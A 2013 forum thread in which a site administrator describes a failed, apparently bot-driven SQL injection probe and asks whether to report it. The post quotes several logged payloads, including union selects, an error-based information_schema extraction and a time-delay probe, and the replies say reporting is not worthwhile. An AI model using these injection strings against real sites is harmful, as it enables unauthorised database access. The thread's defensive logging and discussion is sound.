June 30th, 2013, 09:07 PM
SQL Insertion Attempt, no harm, now what?
Not sure if this is the best place for this. Please move/link if there's a more appropriate place.
A site I manage received an unsuccessful SQL Insertion attack.
100 attempts in 3 minutes. It is a generic series of common attempts, so I assume a bot found the page and was just fishing for vulnerability. It is a simple page which processes a GET through an ID.
I don't believe the site is vulnerable to such an attack. (Though I'm motivated to double check.) These kinds of attacks are in my test plans.
I trapped the attacks (gave a generic 'not found' error), logged them, the IP source, and sent myself an alert.
I checked and can see no harm to the database or the site. I blocked the IPs from further contact with the site.
Apparently, the IPs are for known compromised/intentionally malicious servers:
Here are some sample attack attempts:
Are there authorities to whom it would be worth reporting this event?
file.php?ID=99 and 1=1
file.php?ID=99 and 1>1
file.php?ID=99' and 'x'='x
file.php?ID=999999.9 union all select 0x31303235343830303536--
file.php?ID=99 union all select null,null--
file.php?ID=99 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,database(),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
file.php?ID=99; if (1=1) waitfor delay '00:00:07'--
file.php?ID=99' or 1=convert(int,(select cast(Char(114)+Char(51)+Char(100)+Char(109)+Char(48)+Char(118)+Char(51)+Char(95)+Char(104)+Char(118)+Char(106)+Char(95)+Char(105)+Char(110)+Char(106)+Char(101)+Char(99)+Char(116)+Char(105)+Char(111)+Char(110) as nvarchar(4000))))--
Any other recommended actions?
Is it valuable to anyone for me to post other examples? (They are pretty much variations on the above.)
Otherwise, I'm just going to clean out my log.
No. Assuming you're in the US, attacking a site like that is probably against some law, but the only organizations with the jurisdiction and resources to actually do something about it have far more important things to do with their resources (unless your site happens to be for a major financial or governmental organization).
If the site is already secured then no.
Not that I can think of.